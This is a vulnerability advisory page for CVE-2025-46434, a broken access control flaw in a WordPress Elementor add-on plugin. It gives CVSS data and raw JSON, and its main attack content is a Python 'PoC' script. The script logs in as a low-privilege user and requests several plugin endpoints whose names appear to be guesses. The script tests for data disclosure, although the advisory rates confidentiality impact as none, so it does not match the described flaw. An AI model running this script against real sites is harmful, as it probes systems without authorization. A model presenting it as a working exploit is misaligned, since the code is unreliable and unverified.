Security Vulnerability Report
中文
CVE-2025-46434 CVSS 6.5 MEDIUM

CVE-2025-46434

Published: 2026-01-07 13:15:43
Last Modified: 2026-04-29 10:16:47

Description

Missing Authorization vulnerability in POSIMYTH Innovation The Plus Addons for Elementor Pro theplus_elementor_addon allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects The Plus Addons for Elementor Pro: from n/a through < 6.3.7.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

The Plus Addons for Elementor Pro < 6.3.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-46434 PoC - Missing Authorization in The Plus Addons for Elementor Pro # Target: WordPress site with The Plus Addons for Elementor Pro < 6.3.7 def exploit_cve_2025_46434(target_url, username, password): """ PoC for CVE-2025-46434: Missing Authorization vulnerability This exploits the broken access control in theplus_elementor_addon plugin """ session = requests.Session() # WordPress login endpoint login_url = f"{target_url}/wp-login.php" # Login as low-privilege user (subscriber) login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } session.post(login_url, data=login_data) # Exploit: Access protected endpoint without proper authorization # Try to access admin-only functionality as low-privilege user exploit_endpoints = [ '/wp-json/theplus/v1/settings', '/wp-admin/admin-ajax.php?action=theplus_get_settings', '/wp-json/theplus/v1/export_settings', '/wp-admin/admin-ajax.php?action=theplus_save_settings' ] for endpoint in exploit_endpoints: url = target_url + endpoint response = session.get(url) # If response is 200 and contains sensitive data, vulnerability exists if response.status_code == 200: print(f"[+] VULNERABLE: {endpoint}") print(f"[+] Response preview: {response.text[:500]}") else: print(f"[-] Protected: {endpoint} (Status: {response.status_code})") if __name__ == "__main__": if len(sys.argv) < 4: print("Usage: python cve-2025-46434.py <target_url> <username> <password>") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] print(f"[*] Testing CVE-2025-46434 on {target}") print(f"[*] Using credentials for user: {user}") exploit_cve_2025_46434(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-46434", "sourceIdentifier": "[email protected]", "published": "2026-01-07T13:15:43.273", "lastModified": "2026-04-29T10:16:47.330", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in POSIMYTH Innovation The Plus Addons for Elementor Pro theplus_elementor_addon allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects The Plus Addons for Elementor Pro: from n/a through < 6.3.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/theplus_elementor_addon/vulnerability/wordpress-the-plus-addons-for-elementor-pro-plugin-6-3-7-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}